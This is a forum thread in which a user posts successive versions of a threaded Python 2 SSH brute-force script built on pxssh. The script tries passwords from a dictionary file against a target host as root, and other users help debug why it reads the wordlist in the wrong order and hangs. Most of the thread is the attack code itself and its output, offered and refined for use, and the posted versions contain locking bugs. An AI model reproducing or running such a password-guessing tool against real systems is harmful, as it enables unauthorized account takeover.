chevron_left chevron_right
Login Register invert_colors photo_library


Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average


SSH Brute Force script filter_list
Author
Message
SSH Brute Force script #1
Hi;

So ive made the script and it runs with no errors but doesnt give the output i was hoping it would. The code is as follows:

Code:
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read-nonblocking' in str(e):
            Fails +=1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    parser = optparse.OptionParser('usage%prog '+\
    '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string',\
    help='Specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',\
    help='Specify password file')
    parser.add_option('-u', dest='user', type='string',\
    help='Specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host == None or passwdFile == None or user == None:
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fn.readlines():
        if Found:
            print "[*] Exiting: Password found"
            exit(0)
    connection_lock.acquire()
    password = line.strip('\r').strip('\n')
    print "[-] testing: "+str(password)
    t = Thread(target=connect, args=(host, user, password, True))
    child = t.start()
if __name__ == '__main__':
    main()

When i run it i get the following output:

python sshCommand2.py -H 10.10.1.36 -u root -F dictionary.txt
[-] testing: zhongguo

zhongguo being the last password in the file, so it looks like it is starting with that password and not at the first, the output i was expecting to get would be something like this:

python sshCommand2.py -H 10.10.1.36 -u root -F dictionary.txt
[-] testing: 123456
[-] testing: 12345
[-] testing: 1234
[-] testing: 123
[+] Password Found: Alpine
[-] testing: 1234
[-] testing: 123
[*] Exiting: Password Found

Any idea what ive done wrong here? any help would be much appreciated. Cheers

Reply

RE: SSH Brute Force script #2
What comes after zhogguo?
The next to last password or the first one?


Reply

RE: SSH Brute Force script #3
zhogguo is the very last password in the list so there wouldn't be any more unless you were to go back from the start again in which case the next ones would be:

12345
abc123
password
computer
123456
tigger

Reply

RE: SSH Brute Force script #4
So the program reads the last password(zhogguo) and then start reading the passwords normally from top to the bottom? I'm really not sure what is the problem here, but you could try different way of reading the file:

Readlines() function loads the entire file into memory as it runs. A better approach for large files is to use the fileinput module, as follows:
Code:
import fileinput

for line in fileinput.input(['myfile']):
    do_something(line)
the fileinput.input() call reads lines sequentially, but doesn't keep them in memory after they've been read or even simply so this, since file in python is iterable.


Reply

RE: SSH Brute Force script #5
I tried that and it know goes through all the passwords but doesn't find the password that it should be, just prints all the passwords out sequentially but doesn't find the password:

Code:
import pxssh
import optparse
import time
import fileinput
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read-nonblocking' in str(e):
            Fails +=1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    parser = optparse.OptionParser('usage%prog '+\
    '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string',\
    help='Specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',\
    help='Specify password file')
    parser.add_option('-u', dest='user', type='string',\
    help='Specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host == None or passwdFile == None or user == None:
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fileinput.input(['dictionary.txt']):
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] testing: "+str(password)
        if Found:
            print "[*] Exiting: Password found"
            exit(0)
            if Fails > 5:
                print "[!] Exiting: Too Many Socket Timeouts"
                exit(0)
        connection_lock.acquire()
        print "[-] testing: "+str(password)
        t = Thread(target=connect, args=(host, user, password, True))
        child = t.start()
if __name__ == '__main__':
    main()
(This post was last modified: 10-14-2013, 08:54 AM by Justone.)

Reply

RE: SSH Brute Force script #6
@theRandy
Did you do it correctly?
If I've understand it correctly, it does the same as readlines().


Reply

RE: SSH Brute Force script #7
(10-14-2013, 08:57 AM)Slarek Wrote: @theRandy
Did you do it correctly?
If I've understand it correctly, it does the same as readlines().

Im fairly sure ive done it right, i cut it down a little bit more now to get rid of the option for the input of the password file when running. It seems to run show 4 passwords [-] testing (1 of these being the correct password) and then freezes doesnt go any further and doesnt stop running. Cut down code:

Code:
import pxssh
import optparse
import time
import fileinput
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read-nonblocking' in str(e):
            Fails +=1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    parser = optparse.OptionParser('usage%prog '+\
    '-H <target host> -u <user>')
    parser.add_option('-H', dest='tgtHost', type='string',\
    help='Specify target host')
    parser.add_option('-u', dest='user', type='string',\
    help='Specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    user = options.user
    if host == None or user == None:
        print parser.usage
        exit(0)
    for line in fileinput.input(['dictionary.txt']):
        connection_lock.acquire()
        if Found:
            print "[*] Exiting: Password found"
            exit(0)
            if Fails > 5:
                print "[!] Exiting: Too Many Socket Timeouts"
                exit(0)
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] testing: "+str(password)
        t = Thread(target=connect, args=(host, user, password, True))
        child = t.start()
if __name__ == '__main__':
    main()

Reply

RE: SSH Brute Force script #8
So after it has found the right password, it freezes? Or after 4th password?
Does this script read the password correctly from the top to the bottom?


Reply

RE: SSH Brute Force script #9
With the second piece of code i posted it reads from the top to the bottom but just doesnt find the password, the third (the one i tried to snip) goes in order but stops at the fourth password and doesnt go any further.

Reply

RE: SSH Brute Force script #10
Is the 4th the correct password? Try to change the correct password and we'll see if it stops again in the 4th.


Reply






Users browsing this thread: 1 Guest(s)